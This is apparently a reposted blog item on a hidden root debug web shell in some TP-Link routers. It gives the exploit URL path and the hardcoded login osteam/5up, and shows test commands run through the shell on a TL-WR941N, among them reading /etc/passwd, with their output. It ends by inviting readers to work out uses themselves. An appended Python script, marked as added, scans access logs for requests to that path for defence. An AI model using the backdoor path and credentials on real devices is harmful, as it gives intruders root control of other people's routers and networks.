
TP-LINK router webshell backdoor

2022-08-03 Source: 华拓网


Source: Z's Blog

The TP-Link WDR740ND/WDR740N routers have a hidden debug shell that runs with root privileges and could be abused by an attacker.

Firmware version: 3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam Password: 5up

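Using this shell, an attacker could add malicious routing rules or change configuration files.

============== The above is filler ==============

过客's router: TP-Link TL-WR941N

Software version: 3.11.7 Build 100723 Rel.46142n

Hardware version: WR941N v4/v5 00000000

Starting the test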

cat /proc/cpuinfo&

827

# system type : Atheros AR7240 (Python)

processor : 0

cpu model : MIPS 24K V7.4

BogoMIPS : 265.21

wait instruction : yes

microsecond timers : yes

tlb_entries : 16

extra interrupt vector : yes

hardware watchpoint : yes

ASEs implemented : mips16

VCED exceptions : not available

VCEI exceptions : not available

cat /etc/passwd&

828

# root:x:0:0:root:/root:/bin/sh

Admin:x:0:0:root:/root:/bin/sh

bin:x:1:1:bin:/bin:/bin/sh

daemon:x:2:2:daemon:/usr/sbin:/bin/sh

adm:x:3:4:adm:/adm:/bin/sh

lp:x:4:7:lp:/var/spool/lpd:/bin/sh

sync:x:5:0:sync:/bin:/bin/sync

shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh

operator:x:11:0:Operator:/var:/bin/sh

nobody:x:65534:65534:nobody:/home:/bin/sh

ap71:x:500:0:Linux User,,,:/root:/bin/sh

cat /proc/meminfo&

843

# MemTotal: 30676 kB

MemFree: 12876 kB

Buffers: 1836 kB

Cached: 6056 kB

SwapCached: 0 kB

Active: 6116 kB

Inactive: 3892 kB

HighTotal: 0 kB

HighFree: 0 kB

LowTotal: 30676 kB

LowFree: 12876 kB

SwapTotal: 0 kB

SwapFree: 0 kB

Dirty: 0 kB

Writeback: 0 kB

Mapped: 4276 kB

Slab: 5436 kB

CommitLimit: 15336 kB

Committed_AS: 4324 kB

PageTables: 276 kB

VmallocTotal: 1048560 kB

VmallocUsed: 1944 kB

VmallocChunk: 1046464 kB

# ls /

bin etc linuxrc proc sbin usr web

dev lib mnt root tmp var

#

As for what this can be used for... that is up to you to work out. I'm off.
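
A defensive check, added here as an example and not part of the original post: it scans HTTP access or proxy logs for requests to the debug path quoted above, so an administrator can see which internal clients touched it and what status the router returned. The common/combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Debug-shell directory taken from the page; compared lower-cased after decoding.
DEBUG_DIR = "/userrpmnatdebugrpm26525557"

# Common/combined log format (assumed):
# host ident user [time] "METHOD target PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query string, undo single and double percent-encoding, lower-case."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path.lower()

def find_debug_shell_hits(lines):
    """Return one record per request that touches the hidden debug path."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path = normalize(m["target"])
        if DEBUG_DIR in path:
            hits.append({"client": m["client"], "time": m["time"],
                         "status": int(m["status"]), "path": path})
    return hits

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '192.168.1.23 - - [03/Aug/2022:10:15:02 +0800] "GET http://192.168.1.1/userRpmNatDebugRpm26525557/linux_cmdline.html HTTP/1.1" 200 1843',
    '192.168.1.23 - - [03/Aug/2022:10:15:09 +0800] "GET http://192.168.1.1/index.htm HTTP/1.1" 200 5120',
    '192.168.1.40 - - [03/Aug/2022:11:02:44 +0800] "GET http://192.168.1.1/%75serRpmNatDebugRpm26525557/linux_cmdline.html HTTP/1.1" 401 0',
    '192.168.1.40 - - [03/Aug/2022:11:03:10 +0800] "GET http://192.168.1.1//USERRPMNATDEBUGRPM26525557/x?a=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_debug_shell_hits(SAMPLE_LOG):
        print(f'{hit["time"]}  {hit["client"]}  HTTP {hit["status"]}  {hit["path"]}')
```

A 200 on this path means the device served the page to that client, which is the case to investigate first.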
